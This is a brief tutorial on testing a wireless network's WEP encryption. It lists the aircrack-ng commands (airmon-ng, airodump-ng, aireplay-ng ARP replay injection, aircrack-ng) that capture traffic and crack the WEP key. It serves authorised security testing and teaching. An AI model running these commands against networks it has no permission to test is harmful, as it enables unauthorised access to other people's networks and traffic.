Testing the Security of a Wireless Network

Download the BackTrack ISO and burn it to a CD.  These instructions assume you are using a computer that can boot from a CD drive and that you have an Atheros wireless card.  These instructions are valid for testing WEP encryption.  They have been consolidated from instructions found on the aircrack-ng website.  After booting to BackTrack, run the following commands.

airmon-ng stop ath0
airmon-ng start wifi0

This deletes the default wireless interface and creates a new one in monitor mode.

airodump-ng ath0

Find the network you are interested in, end the first airodump-ng, and start a targeted one.

airodump-ng -c 11 --bssid 01:02:03:04:05:06 --ivs -w dump ath0

The -c parameter tells it which channel to listen on.  --bssid lists the MAC address of the access point of interest, which is optional and only important if more than one access point is broadcasting on the same channel.  --ivs tells airodump-ng to only capture the IVs to save disk space.  -w sets the prefix dump file written to disk.

Open a second terminal and start aireplay-ng to inject ARP packets where -b is the MAC address of the access point bssid and -h is the MAC address of an associated host.

aireplay-ng --arpreplay -b 01:02:03:04:05:06 -h 00:04:05:06:07:08 ath0

Open a third terminal and start aircrack-ng to crack the WEP key.

aircrack-ng -b 01:02:03:04:05:06 dump-01.ivs